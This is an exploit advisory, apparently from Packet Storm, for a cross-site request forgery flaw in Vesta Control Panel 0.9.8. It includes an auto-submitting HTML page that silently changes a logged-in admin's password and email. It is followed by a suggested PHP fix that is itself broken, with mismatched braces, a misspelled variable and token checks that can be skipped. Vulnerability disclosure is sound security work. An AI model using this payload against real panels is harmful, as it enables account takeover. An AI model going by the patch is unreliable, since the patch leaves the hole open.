Vesta Control Panel version 0.9.8 suffers from a cross site request forgery vulnerability.
c2645b4a8ab272752f3327b66ce8adc1b4aa50f89c60265a5dccd5488f217b87# Exploit Title: Vesta Control Panel CSRF(change admin password)
# Date: 24-05-2015
# Exploit Author: Ben Khlifa Fahmi
# Vendor Homepage: https://vestacp.com/
# Software Link: https://vestacp.com/pub/vst-install.sh
# Version: 0.9.8(amd64)
# Tested on: ubuntu trusty 14.04
Description:
---------------------------------------------------------------
The vulnerability exist on the page /edit/user/index.php
The VESTA CP is vulnerable to CSRF Where an attacker can change "admin" password
by sending to already logged in user , once the victim visit the page the user password will changed
to the one has been set by attacker.
Exploit Code :
<html>
<head><title>Victim will redirect auto</title></head>
<body onload="document.forms[0].submit()">
<form>
<form id="vstobjects" method="post" name="v_edit_user" action="https://[target]:8083/edit/user/?user=admin">
<input type="hidden" name="v_user" value="admin" >
<input type="hidden" name="v_username" value="admin">
<input type="hidden" name="v_password" value="[hacker pass]">
<input type="hidden" name="v_email" value="[hacker mail]">
<input type="hidden" name="v_package" value="default" />
<input type="hidden" name="v_language" value="ar" />
<input type="hidden" name="v_fname" value="System">
<input type="hidden" name="v_lname" value="Administrator">
<input type="hidden" name="v_shell" value="bash" />
<input type="hidden" value="ns1.localhost.ltd">
<input type="hidden" value="ns2.localhost.ltd">
<input type="hidden" name="v_ns3">
<input type="hidden" name="v_ns4">
<input type="submit" class="button" name="save" value="Save">
</form>
</body>
</html>
Impact : Critical as an attacker can change admin email , password, dns ....
Solution :
add this code to the page /edit/user/index.php after the session start
$token = uniqid(mt_rand(), true);
if(!isset($_POST)){
$_SESSION['token'] = $token;
}
if(isset($_POST['token']))
if(!($_SESSION['token'] === $_POST['token'])){
header('location: /error/');
}
}
and at the end of page add
$_SESSION['token'] = $toke;
also don't forget to add this html just in the form on page :
<form id="vstobjects" method="post" name="v_edit_user">
<input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>"/>
Greetz to : ArabOUG Cyber Security Team, Tunisian Whitehat Security , Tunisian Agency of Internet Team , BenCure CERT Team(Ben Yahia Mohamed, Ben Salem Salma, Ben khlifa Fahmi(me), Moez Chakchouk, Ben Mne Tarek) Amine Zemzemi , Saif Bejaoui , Mohamed Amen Allah Bechikh , Youssef Warheni , Manel Nouali , Ben Gharbia Jihed , and all my friends
And a special Greetz to my fiancé <3
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed